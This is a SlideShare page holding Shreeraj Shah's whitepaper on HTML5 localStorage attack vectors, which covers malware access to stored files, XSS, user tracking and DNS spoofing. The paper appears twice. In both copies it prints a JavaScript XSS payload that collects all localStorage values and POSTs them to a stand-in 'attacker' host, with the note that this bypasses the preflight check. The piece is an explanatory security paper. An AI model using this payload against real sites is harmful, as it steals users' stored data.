SlideShare uma empresa Scribd logo
1 de 4
Baixar para ler offline
HTML5 localstorage Attack Vectors & Security
By Shreeraj Shah (Blueinfy & iAppSecure)

Storage can expand the attack surface for application users. Storage brings both privacy and security
concerns for end clients within their browsers. It is imperative to have an appropriate defense and
proper protection in place to address this set of issues. The following attacks are possible:

Attack agent fetching sensitive information

LocalStorage is created on the physical hard drive and this file can be accessed by malware or virus that
has access to the underlying OS. For example, as in the case of Chrome, a SQLite file is created in the
user directory as shown below.




Figure 1 – Dir listing of localStorage SQLite files in the user directory in Chrome

It is easy to open files in any SQLite client application and see information stored by the application on
the local system as shown below.




Figure 2 – Viewing localStorage files in SQL client application
Hence, sensitive data stored on localstorage is at significant risk from various standpoints even though it
is of great value from a programming perspective.

Attack through XSS

XSS can be a lethal attack vector for storage. All storage would be accessible using JavaScript. A cookie
marked as HttpOnly would not available to and from JavaScript. But, with sessionStorage and
localStorage, the game changes a bit. Hence, if an application is discovered to be vulnerable to XSS, an
attacker can execute a payload to fetch all session and local storage values and send them back to his
own site. Sensitive information is compromised and the attacker gets access to the entire set of
interesting information. This XSS can be of any type – reflected, persistent or DOM-based.

For example, here is a simple payload.

var xmlhttp=false;
var ls = "";


if(localStorage.length){
          console.log(localStorage.length)
          for(i in localStorage){
                     ls += "("+i +"-"+localStorage.getItem(i)+")";
          }
}

function sendreq()
{
        xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true);

        // Using text/plain to bypass preflight call
        xmlhttp.setRequestHeader("Content-Type", "text/plain");
        xmlhttp.send(ls);
}

sendreq();


Let’s look at the first loop shown below.

if(localStorage.length){
          console.log(localStorage.length)
          for(i in localStorage){
                     ls += "("+i +"-"+localStorage.getItem(i)+")";
          }
}
In this loop all variables from localStorage can be obtained using getItem() call and values can be fetched
along with the key. All of these get stored in the “ls” variable as shown below.




/

Figure 3 – Enumerating the contents of the variable “ls”

In the next call, the attacker can send this harvested value back to his own server and use the XHR call
with “text/plain” to bypass pre-flight call as shown below.

function sendreq()
{
        xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true);

        // Using text/plain to bypass preflight call
        xmlhttp.setRequestHeader("Content-Type", "text/plain");
        xmlhttp.send(ls);
}

Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack.




Figure 4 – browser stack response to the sendreq() call
Hence, the attacker is successful in enumerating values and sending them back to the server. It is
possible to apply the same routine to sessionStorage as well using that object. This technique is a
completely blind enumeration. No information is required for the application; if the application uses the
localStorage object, then loop through all objects to fetch values based on the type as shown below.

for(i in localStorage){
                    ls += "("+i +"-"+localStorage.getItem(i)+")";
           }


It is important to note that applications running with HTML5 use single DOM and when the attacker
finds DOM-based access then it is child’s play for him to inject and exploit DOM-based calls. These calls
could come from a third party server or the content could come from untrusted sources.

Tracking user and invading privacy

LocalStorage is permanent and it gets glued to the browser. An attacker or an advertising company can
drop a localStorage identifier for a specific domain and then have full tracking available through APIs.
These API calls can be passed to their respective sites to track users across the world since it is glued to
single browser. A company with multiple server access as an ad server can start tracking a user from a
single domain and craft their advertising game plan. This invades the privacy of the user. Using
localStorage, a user could be mapped to his/her real identity and would allow persistent tracking using
JavaScript. Currently, the privacy area is a little ignored from HTML5 point of view; in future this may be
a cause of concern for an end user.

DNS spoofing attack vector

LocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker gets
access to the browser session. In this case the localStorage created by targetting the application can
provide access to the sensitive data stored on the browser. This can lead to a potential security breach
and data theft. For example, if a bank stores an identifier, profile and the last 5 transactions on the
localStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISP
end. The application should defend their implementation by using TLS and that should ensure that the
correct certificate is present before communicating and executing JavaScript on the browser session.



About Author

Shreeraj Shah
Founder & Director
Blueinfy and iAppSecure
www.blueinfy.com | www.iappsecure.com
Blog: http://shreeraj.blogspot.com
Twitter: @shreeraj

Mais conteúdo relacionado

Mais procurados

JavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptJavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptLaurence Svekis ✔
 
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Network
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer NetworkSummarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Network
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Networkhideyuki komaki
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
 
What is Material UI?
What is Material UI?What is Material UI?
What is Material UI?Flatlogic
 
Hackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platformHackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platformIhor Uzhvenko
 
Secure Code Warrior - Os command injection
Secure Code Warrior - Os command injectionSecure Code Warrior - Os command injection
Secure Code Warrior - Os command injectionSecure Code Warrior
 
Naxsi, an open source WAF for Nginx
Naxsi, an open source WAF  for NginxNaxsi, an open source WAF  for Nginx
Naxsi, an open source WAF for NginxPositive Hack Days
 
An introduction to bootstrap
An introduction to bootstrapAn introduction to bootstrap
An introduction to bootstrapMind IT Systems
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Symfony presentation
Symfony presentationSymfony presentation
Symfony presentationmaxpower57
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalationjakx_
 
Advanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIAdvanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIRasan Samarasinghe
 
Javascript variables and datatypes
Javascript variables and datatypesJavascript variables and datatypes
Javascript variables and datatypesVarun C M
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Introduction to html 5
Introduction to html 5Introduction to html 5
Introduction to html 5Nir Elbaz
 

Mais procurados (20)

JavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScriptJavaScript guide 2020 Learn JavaScript
JavaScript guide 2020 Learn JavaScript
 
C# operators
C# operatorsC# operators
C# operators
 
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Network
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer NetworkSummarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Network
Summarize of Eclipse Attacks on Bitcoin’s Peer-to-Peer Network
 
Attacking REST API
Attacking REST APIAttacking REST API
Attacking REST API
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
What is Material UI?
What is Material UI?What is Material UI?
What is Material UI?
 
Hackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platformHackazon realistic e-commerce Hack platform
Hackazon realistic e-commerce Hack platform
 
React js
React jsReact js
React js
 
Secure Code Warrior - Os command injection
Secure Code Warrior - Os command injectionSecure Code Warrior - Os command injection
Secure Code Warrior - Os command injection
 
Naxsi, an open source WAF for Nginx
Naxsi, an open source WAF  for NginxNaxsi, an open source WAF  for Nginx
Naxsi, an open source WAF for Nginx
 
An introduction to bootstrap
An introduction to bootstrapAn introduction to bootstrap
An introduction to bootstrap
 
Ajax ppt
Ajax pptAjax ppt
Ajax ppt
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Symfony presentation
Symfony presentationSymfony presentation
Symfony presentation
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalation
 
Advanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST APIAdvanced Web Development in PHP - Understanding REST API
Advanced Web Development in PHP - Understanding REST API
 
Javascript variables and datatypes
Javascript variables and datatypesJavascript variables and datatypes
Javascript variables and datatypes
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Introduction to html 5
Introduction to html 5Introduction to html 5
Introduction to html 5
 

Semelhante a Html5 localstorage attack vectors

Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Understanding dom based xss
Understanding dom based xssUnderstanding dom based xss
Understanding dom based xssPotato
 
White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash AppsOwasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Appsguestb0af15
 
Cyber Security-Ethical Hacking
Cyber Security-Ethical HackingCyber Security-Ethical Hacking
Cyber Security-Ethical HackingViral Parmar
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Hatkit Project - Datafiddler
Hatkit Project - DatafiddlerHatkit Project - Datafiddler
Hatkit Project - Datafiddlerholiman
 
Big Data Security Analytic Solution using Splunk
Big Data Security Analytic Solution using SplunkBig Data Security Analytic Solution using Splunk
Big Data Security Analytic Solution using SplunkIJERA Editor
 
Secure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior
 
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docxCross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docxmydrynan
 

Semelhante a Html5 localstorage attack vectors (20)

Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Web application security
Web application securityWeb application security
Web application security
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Understanding dom based xss
Understanding dom based xssUnderstanding dom based xss
Understanding dom based xss
 
White paper screen
White paper screenWhite paper screen
White paper screen
 
Rust Hack
Rust HackRust Hack
Rust Hack
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash AppsOwasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
 
Pushing the Web: Interesting things to Know
Pushing the Web: Interesting things to KnowPushing the Web: Interesting things to Know
Pushing the Web: Interesting things to Know
 
Cyber Security-Ethical Hacking
Cyber Security-Ethical HackingCyber Security-Ethical Hacking
Cyber Security-Ethical Hacking
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Hatkit Project - Datafiddler
Hatkit Project - DatafiddlerHatkit Project - Datafiddler
Hatkit Project - Datafiddler
 
Big Data Security Analytic Solution using Splunk
Big Data Security Analytic Solution using SplunkBig Data Security Analytic Solution using Splunk
Big Data Security Analytic Solution using Splunk
 
Secure Code Warrior - Local storage
Secure Code Warrior - Local storageSecure Code Warrior - Local storage
Secure Code Warrior - Local storage
 
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docxCross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
 

Mais de Shreeraj Shah

XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

Mais de Shreeraj Shah (19)

XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Html5 localstorage attack vectors

  • 1. HTML5 localstorage Attack Vectors & Security By Shreeraj Shah (Blueinfy & iAppSecure) Storage can expand the attack surface for application users. Storage brings both privacy and security concerns for end clients within their browsers. It is imperative to have an appropriate defense and proper protection in place to address this set of issues. The following attacks are possible: Attack agent fetching sensitive information LocalStorage is created on the physical hard drive and this file can be accessed by malware or virus that has access to the underlying OS. For example, as in the case of Chrome, a SQLite file is created in the user directory as shown below. Figure 1 – Dir listing of localStorage SQLite files in the user directory in Chrome It is easy to open files in any SQLite client application and see information stored by the application on the local system as shown below. Figure 2 – Viewing localStorage files in SQL client application
  • 2. Hence, sensitive data stored on localstorage is at significant risk from various standpoints even though it is of great value from a programming perspective. Attack through XSS XSS can be a lethal attack vector for storage. All storage would be accessible using JavaScript. A cookie marked as HttpOnly would not available to and from JavaScript. But, with sessionStorage and localStorage, the game changes a bit. Hence, if an application is discovered to be vulnerable to XSS, an attacker can execute a payload to fetch all session and local storage values and send them back to his own site. Sensitive information is compromised and the attacker gets access to the entire set of interesting information. This XSS can be of any type – reflected, persistent or DOM-based. For example, here is a simple payload. var xmlhttp=false; var ls = ""; if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; } } function sendreq() { xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true); // Using text/plain to bypass preflight call xmlhttp.setRequestHeader("Content-Type", "text/plain"); xmlhttp.send(ls); } sendreq(); Let’s look at the first loop shown below. if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; } }
  • 3. In this loop all variables from localStorage can be obtained using getItem() call and values can be fetched along with the key. All of these get stored in the “ls” variable as shown below. / Figure 3 – Enumerating the contents of the variable “ls” In the next call, the attacker can send this harvested value back to his own server and use the XHR call with “text/plain” to bypass pre-flight call as shown below. function sendreq() { xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true); // Using text/plain to bypass preflight call xmlhttp.setRequestHeader("Content-Type", "text/plain"); xmlhttp.send(ls); } Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack. Figure 4 – browser stack response to the sendreq() call
  • 4. Hence, the attacker is successful in enumerating values and sending them back to the server. It is possible to apply the same routine to sessionStorage as well using that object. This technique is a completely blind enumeration. No information is required for the application; if the application uses the localStorage object, then loop through all objects to fetch values based on the type as shown below. for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; } It is important to note that applications running with HTML5 use single DOM and when the attacker finds DOM-based access then it is child’s play for him to inject and exploit DOM-based calls. These calls could come from a third party server or the content could come from untrusted sources. Tracking user and invading privacy LocalStorage is permanent and it gets glued to the browser. An attacker or an advertising company can drop a localStorage identifier for a specific domain and then have full tracking available through APIs. These API calls can be passed to their respective sites to track users across the world since it is glued to single browser. A company with multiple server access as an ad server can start tracking a user from a single domain and craft their advertising game plan. This invades the privacy of the user. Using localStorage, a user could be mapped to his/her real identity and would allow persistent tracking using JavaScript. Currently, the privacy area is a little ignored from HTML5 point of view; in future this may be a cause of concern for an end user. DNS spoofing attack vector LocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker gets access to the browser session. In this case the localStorage created by targetting the application can provide access to the sensitive data stored on the browser. This can lead to a potential security breach and data theft. For example, if a bank stores an identifier, profile and the last 5 transactions on the localStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISP end. The application should defend their implementation by using TLS and that should ensure that the correct certificate is present before communicating and executing JavaScript on the browser session. About Author Shreeraj Shah Founder & Director Blueinfy and iAppSecure www.blueinfy.com | www.iappsecure.com Blog: http://shreeraj.blogspot.com Twitter: @shreeraj